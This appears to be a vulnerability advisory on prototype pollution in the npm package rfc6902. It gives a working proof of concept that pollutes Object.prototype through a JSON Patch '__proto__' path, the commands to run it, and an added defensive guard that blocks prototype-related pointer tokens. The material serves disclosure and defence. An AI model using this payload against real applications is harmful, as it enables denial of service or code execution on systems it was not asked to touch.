rfc6902

Vulnerability: Prototype Pollution
Severity: 7.3
Language: TypeScript
Registry: npm

Description

rfc6902 is vulnerable to Prototype Pollution. The package allows modification of prototype behavior, which may result in information disclosure, DoS, or RCE.

Proof of Concept

  1. Create the following PoC file:

     // poc.js
     var rfc6902 = require("rfc6902")
     var obj = {}
     console.log("Before : " + {}.polluted);
     rfc6902.applyPatch(obj, [{ op: 'add', path: "/__proto__/polluted", value: "Yes! Its Polluted"}]);
     console.log("After : " + {}.polluted);

  2. Execute the following commands in another terminal:

     npm i rfc6902 # Install affected module
     node poc.js #  Run the PoC

  3. Check the output:

     Before : undefined
     After : Yes! Its Polluted
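
A mitigation sketch for callers, added here as an example and not taken from the report or from the rfc6902 project: a guard that parses each operation's JSON Pointer (`path`, and `from` on move/copy) and rejects prototype-related tokens before the patch is handed to `applyPatch`. The helper names (`pointerTokens`, `findUnsafeOps`, `assertSafePatch`) and the sample patch are assumptions made for illustration.

```javascript
// Added example: pre-validation guard for JSON Patch documents (hypothetical helper names).
// Trade-off: documents with legitimate keys named like these tokens are rejected too.
const FORBIDDEN_TOKENS = new Set(["__proto__", "constructor", "prototype"]);

// Split an RFC 6901 JSON Pointer into unescaped reference tokens.
function pointerTokens(pointer) {
  if (typeof pointer !== "string") throw new TypeError("pointer must be a string");
  if (pointer === "") return [];
  if (pointer[0] !== "/") throw new SyntaxError("pointer must start with '/'");
  // Order matters: decode ~1 before ~0, so "~01" becomes "~1" and not "/".
  return pointer.slice(1).split("/").map(t => t.replace(/~1/g, "/").replace(/~0/g, "~"));
}

// Return one finding per pointer token that addresses a prototype-related key.
function findUnsafeOps(patch) {
  const findings = [];
  patch.forEach((op, index) => {
    for (const field of ["path", "from"]) {
      // "from" is only present on move/copy; skip fields the operation lacks.
      if (!Object.prototype.hasOwnProperty.call(op, field)) continue;
      for (const token of pointerTokens(op[field])) {
        if (FORBIDDEN_TOKENS.has(token)) findings.push({ index, field, token });
      }
    }
  });
  return findings;
}

// Throw before the patch reaches the patching library if anything is flagged.
function assertSafePatch(patch) {
  const findings = findUnsafeOps(patch);
  if (findings.length > 0) {
    const f = findings[0];
    throw new Error(`operation ${f.index}: ${f.field} contains forbidden token "${f.token}"`);
  }
  return patch;
}

// Constructed sample input: the PoC operation from this report plus benign operations.
const samplePatch = [
  { op: "add", path: "/__proto__/polluted", value: "Yes! Its Polluted" },
  { op: "replace", path: "/profile/name", value: "alice" },
  { op: "copy", from: "/constructor/prototype", path: "/copied" },
  { op: "add", path: "/a~1b/proto", value: 1 },
];
console.log(findUnsafeOps(samplePatch));
```

Call `assertSafePatch(patch)` on untrusted input immediately before applying it; upgrading to a release of the package that fixes the issue remains the primary remediation.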